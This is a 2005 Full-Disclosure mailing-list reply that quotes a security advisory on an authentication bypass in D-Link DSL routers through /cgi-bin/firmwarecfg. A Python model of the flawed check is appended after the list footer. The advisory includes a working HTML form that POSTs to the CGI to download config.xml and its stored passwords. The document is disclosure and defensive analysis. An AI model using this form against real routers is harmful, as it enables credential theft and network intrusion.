Hello.

Could the D-Link DI-604 story at <http://groups-beta.google.com/group/sci.astro.seti/msg/71095063e414a3e2> be related to this vulnerability? I myself also have a DI-604 that broke down in exactly the same way as described above, and the above was the only similar case I have yet found on the net. My suspicion was also that the box had been hacked, and your vulnerability post now shows that exploitable holes in D-Link boxes exist.

-Sebastian

On Thu, 19 May 2005 16:41:56 +0200 Francesco Orro <[EMAIL PROTECTED]> wrote:

> ====================== SUMMARY ========================
>
> Title: D-Link DSL routers authentication bypass
> Date: 19 May 2005
> Author: Francesco Orro <francesco.orro 4t akhela.com>
>
> Product: DSL-502T, DSL-504T, DSL-562T, DSL-G604T
> Vendor: D-Link
> Vendor URL: http://www.dlink.com
> Vendor Status: D-Link was contacted
> Affects: Tested on DSL-502T, DSL-504T, DSL-562T, DSL-G604T with
> various firmware versions
> Risk: High
> Impact: Unauthorized people may gain full access to the device
>
> Vulnerability Description: an undocumented feature allows (in some
> cases) bypassing the authentication prompt and gaining full access to the
> router, and then to the network behind it.
>
>
> ====================== BACKGROUND ========================
>
> D-Link DSL routers are commonly used for internet connectivity for home
> or small office needs. (http://www.dlink.com/products/)
>
>
> =============== PROBLEM DESCRIPTION ==================
>
> The CGI /cgi-bin/firmwarecfg, when executed, checks the existence of the
> file fw_ip under /var/tmp/. If this file exists, all IP addresses listed
> inside it are given straight access to the device, without the need for
> authentication. If this file doesn't exist, the CGI creates a new one,
> putting the requesting address inside.
>
> If the web configuration console is accessible from the internet and if
> nobody has ever called the CGI before (e.g. from a workstation inside
> the LAN), then everybody can gain access to the router, download the
> config.xml file which contains user accounts and passwords, gain access
> to the private network, modify or alter the firmware of the router,
> etc.
>
>
> ================ ADDITIONAL DETAILS ==================
>
> The vulnerability was found on the following firmware versions:
>
> V1.00B01T16.EN.20040211
> V1.00B01T16.EU.20040217
> V0.00B01T04.UK.20040220
> V1.00B01T16.EN.20040226
> V1.00B02T02.EU.20040610
> V1.00B02T02.UK.20040618
> V1.00B02T02.EU.20040729
> V1.00B02T02.DE.20040813
> V1.00B02T02.RU.20041014
>
> It can be exploited by a simple HTTP POST with the form:
>
> <html>
> <head>Download config.xml:<title>GetConfig - Config file download</title></head>
> <body>
>
> <script lang="javascript">
> function invia_richiesta()
> {
>   document.DownloadConfig.action='http://'+document.InputBox.Host.value+'/cgi-bin/firmwarecfg';
>   document.DownloadConfig.submit();
> }
> </script>
>
> <form name="InputBox">
> <br>http://<input Name="Host" type="text" value="">/cgi-bin/firmwarecfg<br>
> </form>
> <form name="DownloadConfig" method="POST" action="" enctype="multipart/form-data">
> <input type="Submit" name="config" value="Download" onClick="javascript:invia_richiesta();"><br>
> </form>
>
> </body>
> </html>
>
>
> =================== FIX INFORMATION ===================
>
> At present there is no solution to the problem, since it seems to be
> a hidden feature.
> The workaround is to call the CGI /cgi-bin/firmwarecfg from a known
> address of the local network and/or disable web console access from the
> internet.
>
>
> ================ AUTHOR INFORMATION ================
>
> Francesco Orro
> Akhela S.r.l. - Operation Group
> http://www.akhela.com/
>
> EMail: francesco.orro 4t akhela.com
> KeyID: 6CF46D45
>
>
> =================== DISCLOSURE HISTORY =====================
>
> 2 May 2005 - First private release of this advisory;
> 4 May 2005 - The vendor (D-Link Mediterraneo S.r.l.) was informed
> of the vulnerability;
> 5 May 2005 - The vendor replied that the problem was resolved in
> firmware version V1.00B02T02.EU.20040610, but it has been
> demonstrated that this version is vulnerable too;
> 19 May 2005 - Public release of this advisory.
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
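The access-check logic the advisory describes (a "first caller is trusted" allow-list seeded by /var/tmp/fw_ip) is a trust-on-first-use flaw, and the quoted workaround only works because it seeds that list from a LAN address before any outside caller does. The following Python model is an added illustration written for this thread, not D-Link firmware code and not the advisory author's: the fw_ip file name and the seeding behaviour come from the advisory; the 192.168.0.0/24 LAN prefix, the sample addresses, and the hardened variant (LAN-only, authenticated seeding) are assumptions made for the example.

```python
"""Model of the /cgi-bin/firmwarecfg access check described in the advisory.

Added illustration; not D-Link firmware code. The /var/tmp/fw_ip behaviour is
taken from the advisory text; the LAN prefix, addresses and the hardened
variant are assumptions for this example only.
"""
import ipaddress

LAN = ipaddress.ip_network("192.168.0.0/24")  # assumed LAN subnet


class VulnerableFirmwareCfg:
    """Reproduces the described logic: when fw_ip does not exist, the first
    requester is written into it and then granted access without a password."""

    def __init__(self):
        self.fw_ip = None  # None models "/var/tmp/fw_ip does not exist"

    def request(self, src):
        src = ipaddress.ip_address(src)
        if self.fw_ip is None:
            self.fw_ip = {src}   # file created with the requesting address
            return True          # first caller is silently trusted
        return src in self.fw_ip # later callers are checked against the file


class HardenedFirmwareCfg:
    """How such a check should behave: requests from outside the LAN are
    refused outright (the advisory's workaround), and the allow-list is only
    ever seeded by an authenticated request from inside the LAN."""

    def __init__(self):
        self.fw_ip = set()

    def request(self, src, authenticated=False):
        src = ipaddress.ip_address(src)
        if src not in LAN:
            return False         # no web console from the internet
        if authenticated:
            self.fw_ip.add(src)  # seeding requires a real login
            return True
        return src in self.fw_ip


def demo():
    """Returns (wan_first_vulnerable, wan_first_hardened, wan_after_lan_seed)."""
    v = VulnerableFirmwareCfg()
    wan_first_vulnerable = v.request("203.0.113.5")  # unauthenticated WAN caller gets in

    h = HardenedFirmwareCfg()
    wan_first_hardened = h.request("203.0.113.5")    # refused: outside the LAN

    v2 = VulnerableFirmwareCfg()
    v2.request("192.168.0.10")                        # the advisory's workaround: seed from LAN first
    wan_after_lan_seed = v2.request("203.0.113.5")    # now refused: not in fw_ip

    return wan_first_vulnerable, wan_first_hardened, wan_after_lan_seed


if __name__ == "__main__":
    print(demo())
```

The third value shows why the workaround is fragile: it depends on a LAN host winning the race to create fw_ip, and on that file surviving (a reboot that clears /var/tmp would reopen the window). Disabling WAN access to the web console, as the advisory also recommends, removes the race entirely.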
